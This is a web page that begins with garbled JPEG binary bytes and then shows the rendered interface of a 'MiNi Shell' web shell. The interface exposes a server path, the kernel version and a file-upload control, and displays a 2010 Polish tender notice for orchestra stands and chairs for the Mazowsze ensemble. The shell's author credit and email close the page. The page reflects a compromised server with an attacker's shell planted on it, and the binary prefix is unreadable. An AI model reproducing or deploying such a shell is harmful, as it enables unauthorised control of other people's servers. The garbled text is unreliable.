JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100902/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100902/238185-N-2010.html

<p class="kh_header"><b>Otrębusy: Dostawa i montaż wyposażenia  siedziby Matecznik Mazowsze Centrum Folklorystyczne - akcesoria dla orkiestry</b><br>
<b>Numer ogłoszenia: 238185 - 2010; data zamieszczenia: 02.09.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Państwowy Zespół Ludowy Pieśni i Tańca "Mazowsze" im. Tadeusza Sygietyńskiego , ul. Świerkowa 2, 05-805 Otrębusy, woj. mazowieckie, tel. 22 2088888, faks 22 2088800.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: instytucja kultury.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa i montaż wyposażenia  siedziby Matecznik Mazowsze Centrum Folklorystyczne - akcesoria dla orkiestry.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest wykonanie dostawy i montażu fabrycznie nowego wyposażenia  Sali Widowiskowo-Edukacyjnej Europejskiego Centrum Promocji Kultury Regionalnej i Narodowej Matecznik Mazowsze Centrum Folklorystyczne  w Karolinie zgodnie z poniższym wykazem. Przedmiotem zamówienia obejmuje także: transport do siedziby Zamawiającego, wniesienie,  pierwszy serwis gwarancyjny  po dostawie.


Lp.	Nazwa akcesorium	Opis	j.m.	Ilość
1	Pulpit orkiestrowy z lampą LED i półeczką  typu KOLBERG4230D/4125S/4320LED/4240 lub równoważny	 Pulpit orkiestrowy ze zintegrowaną lampą dwupunktową i półką na akcesoria i  instrumenty  (blacha, drewno, perkusja) 
- blat wykonany ze specjalnego tworzywa sztucznego odpornego na uderzenia
- waga blatu 3,2 Kg
- blat o wymiarach 55 x 37 cm w kolorze czarnym 
- dodatkowa podwójna półeczka nie zmniejszająca wymiarów blatu z wgłębieniem na ołówek
- wszystkie kanty zaokrąglone 
- dodatkowe wzmocnienie z tyłu blatu przy rozecie
- struktura drewnopodobna
- rozeta mocująca blat  na 6 śrubach  z adapterem na lampę
- regulacja kąta nachylenia i wysokości ustawienia lampy
- rurka łącząca z podstawą o przekroju 20mm i długości 60cm
- podstawa stalowa w kształcie litery V
-możliwość zestawienia do 20 pulpitów na jednym wózku transportowym
-pokryta lakierem proszkowym w kolorze srebrno-czarnym
-waga podstawy specjalnie obciążona 4,2 Kg (model operowy)
- przekrój rurki 25mm , wysokość podstawowa 70cm
- lampa halogenowa dwupunktowa 2 x 20 W  24V/220V
- klosze obrotowe  o 360 stopni niezależnie od siebie
- możliwość regulacji wysokości do 10 cm
 -w komplecie 3 m kabla i 2  żarówki
 - dodatkowa półeczka dokręcana do górnej lub dolnej rurki pod blatem
 - waga 1,9 Kg
  - wymiary  40 x 12 cm
  - wykonana z drewna w kolorze czarnym
  - z dodatkowymi otworami na tłumiki i uchwyty do instrumentów
  - wyłożona grubym filcem w kolorze czarnym
	kpl.	9  
2	Pulpit orkiestrowy z lampą LED bez  półeczki typu Kolberg 4230D/4125S/4320LED
lub równoważny	- blat wykonany ze specjalnego tworzywa sztucznego odpornego na uderzenia
- waga blatu 3,2 kg
- blat o wymiarach 55 x 37 cm w kolorze czarnym 
- dodatkowa podwójna półeczka nie zmniejszająca wymiarów blatu z wgłębieniem na ołówek
- wszystkie kanty zaokraglone 
- dodatkowe wzmocnienie z tyłu blatu przy rozecie
- struktura drewnopodobna
- rozeta mocująca blat  na 6 śrubach  z adapterem na lampę
- regulacja kąta nachylenia i wysokości ustawienia lampy
- rurka łącząca z podstawą o przekroju 20mm i długości 60cm
- podstawa stalowa w kształcie litery V
- możliwość zestawienia do 20 Pulpitów na jednym wózku transportowym
- pokryta lakierem proszkowym w kolorze srebrno-czarnym
- waga podstawy specjalnie obciążona 4,2 Kg (model operowy)
- przekrój rurki 25mm , wysokość podstawowa 70cm
- lampa halogenowa dwupunktowa 2 x 20 W  24V/220V
- klosze obrotowe  o 360 stopni niezależnie od siebie
- możliwość regulacji wysokości do 10 cm
- w komplecie 3 m kabla i 2  żarówki
	kpl.	10
3	Pulpit dyrygencki typu Kolberg 4512
lub równoważny	Pulpit dyrygencki z trapem na partytury  do sali prób model koncertowo- studyjny 
- waga 10,6 Kg
- blat drewniany w kolorze czarnym o wymiarach 70 x 45 cm
- wykonany z drewna bukowego
- trap pod blatem drewniany o wymiarach 70 x 45 cm
- podstawa stalowa w kształcie litery U
- pokryta lakierem proszkowym w kolorze srebrno-czarnym
- regulacja wysokości od 70-135 cm z adapterem
- regulacja kąta nachylenia blatu
	kpl.	1
4	Krzesło dla dyrygenta  typu Kolberg 3110 D nieobrotowe
lub równoważne	 -  waga 11 kg
  -  krzesło nieobrotowe
  -  siedzisko ergonomiczne w kształcie litery S
  -  materiał siedziska w kolorze srebrno-czarnym
  -   bezszelestna i pneumatyczna regulacja kąta nachylenia siedziska
  -  w górę 7 stopni
  -  w dół   13 stopni
  -  pneumatyczna regulacja wysokości 57-83 cm
  -  ruchome oparcie dostosowujące się do sposobu siedzenia
 - podstawa na pięcionogu chromowana
 - specjalny podnóżek obrotowy z regulacją wysokości pokryty chromem
	szt.	1
5	Krzesło dla kotlisty typu Kolberg 3110 obrotowe
lub równoważne	-  waga 11 kg
  -  krzesło nieobrotowe
  -  siedzisko ergonomiczne w kształcie litery S
  -  materiał siedziska w kolorze srebrno-czarnym
  -   bezszelestna i pneumatyczna regulacja kąta nachylenia siedziska
  -  w górę 7 stopni
  -  w dół   13 stopni
  -  pneumatyczna regulacja wysokości 57-83 cm
  -  ruchome oparcie dostosowujące się do sposobu siedzenia
 - podstawa na pięcionogu chromowana
 - specjalny podnóżek obrotowy z regulacją wysokości pokryty chromem
	szt.	1
6	Krzesło kontrabasowe typu Kolberg 3090
lub równoważne	- waga 12 kg.
- krzesło nieobrotowe
- siedzisko ergonomiczne wyprofilowane w kształcie litery S
- specjalne wycięcie prawego narożnika
  -  materiał siedziska w kolorze srebrno-czarnym 
  - siedzisko wyłożone wysokiej klasy gąbką o grubości 25mm
 - Bezszelestna i pneumatyczna  regulacja kąta nachylenia siedziska 
 - w górę 7 stopni
 - w dół  13 stopni
 - płynna i pneumatyczna  regulacja wysokości 70-83 cm
 - ruchome oparcie dostosowujące się do sposobu siedzenia 
  - kąt oparcia pozwalający na siedzenie na samym kancie krzesła z możliwością oparcia
 - podstawa na czteronogu chromowana
 - dodatkowe ruchome podpórki na nogi 
 -  obrotowe i składane
 - możliwość ustawienia podpórek w różnych pozycjach
	szt.	1
7	Krzesło profilowane kanał orkiestry z regulacją wysokości typu Kolberg model 3100H
lub równoważne	 - waga  8,5 kg
 - wysokość min. 48 cm - max. 52 cm
 - płynna regulacja wysokości 48-52 cm za pomocą centralnego pokrętła pod siedziskiem
 - specjalnie formowane siedzisko w kształcie litery S
 - wymiary siedziska 44 x 42 cm
  - materiał siedziska w kolorze srebrno-czarnym 
  - siedzisko wyłożone wysokiej klasy gąbką o grubości 25mm
   - bezszelestna i płynna regulacja kąta nachylenia siedziska 
 - w górę 7 stopni
 - w dół  13 stopni
  - ruchome oparcie dostosowujące się do sposobu siedzenia muzyka
  - pneumatyczna regulacja kąta nachylenia oparcia 
  - kąt oparcia pozwalający na siedzenie na samym kancie krzesła z możliwością oparcia
  - podstawa stelaż pokryty lakierem proszkowym w kolorze srebrno-czarnym
  - możliwość układania do 7 krzeseł jedno na drugim. bez  wzajemnego kontaktu siedzisk
	szt.	26

2.	Miejsce realizacji: siedziba Zamawiającego.
3.	Dostawa  odbywać się będzie w funkcjonującym obiekcie.
4.	Wykonawca obowiązany jest do stosowania w toku realizacji umowy zasad promocji określonych przez Mazowiecką Jednostkę Wdrażania Programów Unijnych zgodnie z zał. nr 6 
5.	Na dostarczone akcesoria wymagana jest gwarancja na okres minimum 36 miesięcy.
6.	Zamawiający dopuszcza w realizacji przedmiotu zamówienia udział podwykonawców w zakresie transportu, wniesienia oraz serwisu gwarancyjnego.
7.	Wykonawca wskaże  serwisanta gwarancyjnego i pogwarancyjnego dla akcesoriów będących przedmiotem zamówienia.
8.	Zamawiający nie dopuszcza składania ofert częściowych.
9.	Zamawiający nie dopuszcza składania ofert wariantowych.
10.	Wykonawca przed złożeniem oferty może dokonać wizji lokalnej miejsca dostawy po uprzednim powiadomieniu Zamawiającego.
11.	Jeżeli w opisie przedmiotu zamówienia znajdują się jakiekolwiek znaki towarowe, patent czy pochodzenie - należy przyjąć, że Zamawiający, ze względu na specyfikę przedmiotu zamówienia, podał taki opis ze wskazaniem na model i dopuszcza składanie ofert równoważnych, o parametrach techniczno-użytkowych nie gorszych niż te podane w opisie przedmiotu zamówienia ( podstawa prawna art. 29 ust.3 PZP).W przypadku złożenia oferty zawierającej zastosowanie rozwiązań równoważnych, udowodnienie równoważności instrumentów ze wskazanymi przez zamawiającego, leży po stronie Wykonawcy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 37.32.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 25.11.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> dla udziału w postępowaniu jest wymagane wniesienie wadium w wysokości 2 000,00 zł (słownie: dwa tysiące złotych).</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące posiadania wiedzy  i doświadczenia:
 Wykonawcy spełniają ten warunek, jeżeli  wykonali dostawy akcesoriów muzycznych w okresie ostatnich 3 lat przed upływem składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie - co najmniej 2 dostawy o podobnym charakterze polegające na dostarczeniu i montażu profesjonalnych  akcesoriów muzycznych o wartości co najmniej 60 000 zł brutto każda. 
Wykonawca  zobowiązany jest wykazać spełnienie warunków w zakresie posiadania wiedzy i doświadczenia poprzez złożenie odpowiednich dokumentów wymienionych w Dziale 3. Zamawiający dokona oceny spełniania  przez Wykonawców warunków udziału na dzień składania ofert  na podstawie analizy  treści złożonych oświadczeń i dokumentów złożonych na potwierdzenie spełniania warunków udziału                      w postępowaniu.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">zaświadczenie podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczane produkty odpowiadają określonym normom lub specyfikacjom technicznym</li>

</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>oświadczenie, że po zrealizowaniu dostawy Zamawiający otrzyma Certyfikaty Oryginalności dostarczonych akcesoriów oraz aktualny certyfikat CE lub deklarację zgodności stwierdzającą, że są to produkty bezpieczne (zgodnie z ustawą z dnia 30 sierpnia 2002r. o systemie zgodności, tekst jednolity opublikowany w Dz.U. Nr 204 z 2004r., poz. 2087.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mazowsze.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Państwowy Zespół Ludowy Pieśni i Tańca 
Mazowsze im. Tadeusza Sygietyńskiego
ul. Świerkowa 2, 05-805 Otrębusy, pok. 216.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.09.2010 godzina 10:00, miejsce: Państwowy Zespół Ludowy Pieśni i Tańca 
Mazowsze im. Tadeusza Sygietyńskiego
ul. Świerkowa 2, 05-805 Otrębusy, pok. 118, sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany przez Unię Europejską ze środków
 Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego Województwa Mazowieckiego 2007-2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com